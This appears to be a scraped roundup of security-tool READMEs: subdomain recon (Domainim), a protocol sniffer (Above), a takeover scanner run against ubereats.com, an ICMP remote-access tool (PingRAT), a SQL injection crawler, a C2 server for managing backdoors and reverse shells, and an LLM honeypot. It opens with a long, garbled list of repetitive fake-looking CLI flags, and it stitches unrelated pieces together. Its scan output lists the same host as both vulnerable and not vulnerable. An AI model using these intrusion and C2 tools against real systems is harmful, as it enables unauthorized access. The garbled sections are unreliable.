[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
- Vulnerability detection: --detect, --exclude-detectors
- Reporting: --report-format, --report-output, --report-*
- Filtering: --filter-*
- AI integration: --ai-*
- Truffle integration: --truffle, --truffle-build-directory
- Compilation and detector listing: --compile, --list-detectors, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1):
- Subdomain enumeration (2 engines + bruteforcing)
- User-friendly output
- Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source. Clone the repository and build:
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
- <domain> is the domain to be enumerated. It can be a subdomain as well.
- --ports | -p is a string specification of the ports to be scanned (see the sketch after the examples below). It can be one of the following:
  - all - Scan all ports (1-65535)
  - none - Skip port scanning (default)
  - t<n> - Scan the top n ports (same as nmap), i.e. t100 scans the top 100 ports. The max value is 5000; if n is greater than 5000, it will be set to 5000.
  - A single value, i.e. 80 scans port 80
  - A range, i.e. 80-100 scans ports 80 to 100
  - A combination, i.e. 80,443,8080 scans ports 80, 443 and 8080, and 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and the top 500 ports
- --dns | -d is the address of the DNS server. This should be a valid IPv4 address and can optionally contain the port number:
  - a.b.c.d - Use the DNS server at a.b.c.d on port 53
  - a.b.c.d#n - Use the DNS server at a.b.c.d on port n
- --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided on the release page.
- --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch is made only after the previous one is completed. Since queries can be rate limited, increasing the value does not always guarantee faster results.
- --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.
Examples:
- ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
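As referenced in the options above, here is a small Python sketch (Domainim itself is written in Nim) that expands a port specification like 80,443,8080-8090,t500 into a port set; the top-n count is returned separately, since the top-ports table comes from nmap:

```python
def expand_ports(spec: str, max_top=5000):
    """Expand a domainim-style port spec ("all", "none", "t<n>",
    single ports, ranges, comma-separated combinations)."""
    ports, top_n = set(), 0
    if spec == "all":
        return set(range(1, 65536)), top_n
    if spec == "none":
        return ports, top_n
    for part in spec.split(","):
        if part.startswith("t"):          # t<n>: top n ports, capped at 5000
            top_n = min(int(part[1:]), max_top)
        elif "-" in part:                 # range, e.g. 8080-8090
            lo, hi = map(int, part.split("-"))
            ports.update(range(lo, hi + 1))
        else:                             # single port
            ports.add(int(part))
    return ports, top_n

print(expand_ports("80,443,8080-8090,t500"))
```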
The help menu can be accessed using ./domainim --help or ./domainim -h.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json
The JSON schema for the results is as follows:
[
  {
    "subdomain": string,
    "data": [
      {
        "ipv4": string,
        "vhosts": [string],
        "reverse_dns": string,
        "ports": [int]
      }
    ]
  }
]
An example JSON for nmap.org can be found here.
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I call them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results in case there are too many. Another issue with crt.sh is that it sometimes returns an SQL error, so for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute-force engine).
The port scanner's timeout is only the ping response time + 750ms. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed just brings repetition to the table. Printing them as follows might have been better:
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
↳ 45.33.49.119
↳ Reverse DNS: ack.nmap.org.
But while testing earlier, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.
The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This avoids hitting the DNS server with all the queries at once, spreading them in a more natural way. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.
One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain, so it is necessary to make multiple queries to get all (or most) of them. But then again, it is not possible to know how many IPs there are for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author on this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing would resolve IPv4 for all possible subdomains; however, it would also skip valid subdomains (i.e. scanme.nmap.org would be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
A similar thing is true for vhost enumeration with subdomain inputs. Since only URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.
MIT License. See LICENSE for full text.
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Above: Invisible network protocol sniffer
Designed for pentesters and security engineers
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It's invisible. It is completely based on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes:
- Hot mode: sniffing live on a specified interface; the captured traffic can also be recorded to a .pcap file whose name you specify yourself
- Cold mode: analyzing traffic dumps; the tool takes a .pcap file as input and looks for protocols in it
The tool is very simple in its operation and is driven by arguments:
file, its name you specify yourselfusage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester but also to the security engineer, who will know what needs attention.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
- Impact: what kind of attack can be performed on this protocol
- Tools: what tool can be used to launch an attack
- Technical information: required information for the pentester, such as sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
- Mitigation: recommendations for fixing the security problems
- Source/Destination Addresses: for protocols, Above displays information about the source and destination MAC and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + C
WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
If you need to record the sniffed traffic, use the --output argument:
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the --input argument to look for potential security issues:
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without making noise on the air by processing ARP frames in passive mode:
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
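Conceptually, passive ARP host discovery is just listening for ARP replies without ever transmitting. A minimal Scapy sketch of the idea (not Above's actual code; requires root):

```python
from scapy.all import sniff, ARP

def on_arp(pkt):
    # op == 2 is an ARP reply ("is-at"): log the advertised IP/MAC pair.
    if pkt[ARP].op == 2:
        print(f"[+] Detected ARP Reply: {pkt[ARP].psrc} is at {pkt[ARP].hwsrc}")

# Listen only; no packets are sent, so nothing appears on the air.
sniff(iface="eth0", filter="arp", prn=on_arp, store=False)
```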
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME record in the DNS but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
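The core check is conceptually simple: resolve the subdomain's canonical name, then look for a provider-specific fingerprint in the HTTP response. A rough Python sketch of that logic (Subhunter itself is written in Go and ships curated fingerprints; the single fingerprint below is illustrative only):

```python
import socket
import urllib.request

# Illustrative fingerprint; real tools ship curated lists per provider.
FINGERPRINTS = {"github.io": "There isn't a GitHub Pages site here"}

def possible_takeover(subdomain: str) -> bool:
    try:
        cname = socket.gethostbyname_ex(subdomain)[0]  # canonical name
        body = urllib.request.urlopen(
            f"http://{subdomain}", timeout=20
        ).read().decode(errors="replace")
    except OSError:
        return False
    return any(svc in cname and sig in body for svc, sig in FINGERPRINTS.items())

print(possible_takeover("testauth.ubereats.com"))
```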
Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
Download the binaries or build them from source and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
pip3 install sqlmc
Run sqlmc with the following command-line arguments:
- -u, --url: The URL to scan (required)
- -d, --depth: The depth to scan (required)
- -o, --output: The output file to save the results

Example usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
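The described approach (crawl to a fixed depth, then probe every discovered link) is easy to picture in code. A rough sketch, assuming requests and BeautifulSoup, with an error-signature list that is a small illustrative subset rather than the tool's real one:

```python
# Breadth-first crawl limited by depth, then a naive error-based SQLi probe:
# append a quote to each URL and watch for database error text.
from urllib.parse import urljoin, urlparse
import requests
from bs4 import BeautifulSoup  # pip install beautifulsoup4

SQL_ERRORS = ("you have an error in your sql syntax", "unclosed quotation mark")

def crawl(start: str, depth: int) -> set[str]:
    seen, frontier = {start}, [start]
    for _ in range(depth):
        nxt = []
        for page in frontier:
            try:
                soup = BeautifulSoup(requests.get(page, timeout=10).text, "html.parser")
            except requests.RequestException:
                continue
            for a in soup.find_all("a", href=True):
                link = urljoin(page, a["href"])
                if urlparse(link).netloc == urlparse(start).netloc and link not in seen:
                    seen.add(link)
                    nxt.append(link)
        frontier = nxt
    return seen

def looks_injectable(url: str) -> bool:
    try:
        body = requests.get(url + "'", timeout=10).text.lower()
    except requests.RequestException:
        return False
    return any(err in body for err in SQL_ERRORS)
```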
This project is licensed under the GNU Affero General Public License v3.0.
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
Flask: Serving web and API traffic, facilitating reverse HTTP(S) requests.
TCP Socket: Serving reverse TCP requests for enhanced functionality.
Nginx: Effortlessly routing traffic between web and backend systems.
Redis PubSub: Serving as a robust message broker for seamless communication.
Websockets: Delivering real-time updates to browser clients for enhanced user experience.
Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
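To illustrate how the pieces above can fit together, here is a minimal sketch (not C2 Cloud's actual code) of a TCP listener relaying shell I/O through Redis Pub/Sub to a web tier; the channel names are assumptions:

```python
# A raw TCP listener bridges backdoor connections to Redis Pub/Sub: the web
# tier publishes commands on cmd:<session>, and shell output comes back on
# out:<session> for Websockets to stream to the browser.
import socket
import threading
import redis  # pip install redis

r = redis.Redis()

def handle(conn: socket.socket, session_id: str) -> None:
    sub = r.pubsub()
    sub.subscribe(f"cmd:{session_id}")
    def pump_commands():
        for msg in sub.listen():
            if msg["type"] == "message":
                conn.sendall(msg["data"] + b"\n")  # forward command to the backdoor
    threading.Thread(target=pump_commands, daemon=True).start()
    while chunk := conn.recv(4096):
        r.publish(f"out:{session_id}", chunk)  # publish output for the web tier

srv = socket.socket()
srv.bind(("0.0.0.0", 8888))  # matches the reverse TCP port above
srv.listen()
while True:
    conn, addr = srv.accept()
    threading.Thread(target=handle, args=(conn, f"{addr[0]}:{addr[1]}"), daemon=True).start()
```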
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
TL;DR: Galah (/ɡəˈlɑː/, pronounced "guh-laa") is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.
Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!
I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
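A minimal sketch of that per-port cache idea (the key layout and TTL handling here are assumptions, not Galah's actual code):

```python
# Cache LLM responses keyed by (port, hash of raw request), so the same
# request on a different port is a deliberate cache miss.
import hashlib
import time

class ResponseCache:
    def __init__(self, ttl_seconds: int):
        self.ttl = ttl_seconds
        self.store: dict[tuple[str, str], tuple[float, str]] = {}

    def _key(self, port: str, raw_request: bytes) -> tuple[str, str]:
        return (port, hashlib.sha256(raw_request).hexdigest())

    def get(self, port: str, raw_request: bytes):
        entry = self.store.get(self._key(port, raw_request))
        if entry and time.time() - entry[0] < self.ttl:
            return entry[1]
        return None  # miss: the caller queries the LLM, then calls put()

    def put(self, port: str, raw_request: bytes, response: str) -> None:
        self.store[self._key(port, raw_request)] = (time.time(), response)
```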
The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.
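For the curious, the core loop is easy to caricature: hand the raw HTTP request to an LLM and ask for a response in the JSON shape shown in the logs below. This toy (not Galah itself) assumes the openai Python package (>=1.0), an OPENAI_API_KEY in the environment, and an arbitrary model name; it ignores the Status field and always answers 200 for brevity:

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from openai import OpenAI  # pip install openai

client = OpenAI()  # reads OPENAI_API_KEY from the environment

PROMPT = ('You are a web server. Reply ONLY with JSON of the form '
          '{"Headers": {...}, "Body": "..."} for this HTTP request:\n')

class Honeypot(BaseHTTPRequestHandler):
    def do_GET(self):
        raw = f"{self.command} {self.path} {self.request_version}\n{self.headers}"
        answer = client.chat.completions.create(
            model="gpt-4o-mini",  # assumption: any chat-capable model works here
            messages=[{"role": "user", "content": PROMPT + raw}],
        ).choices[0].message.content
        reply = json.loads(answer)  # real code would validate this
        self.send_response(200)
        for name, value in reply.get("Headers", {}).items():
            if name.lower() != "status":
                self.send_header(name, value)
        self.end_headers()
        self.wfile.write(reply.get("Body", "").encode())

HTTPServer(("", 8080), Honeypot).serve_forever()
```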
Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.
Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.
Support for Other LLMs.
Settings such as the prompt, cache duration, and TLS profiles are defined in the config.yaml file.
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v
[ Galah ASCII-art banner ]
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi
2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned
2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434
^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.
Here are some example responses:
% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>
JSON log record:
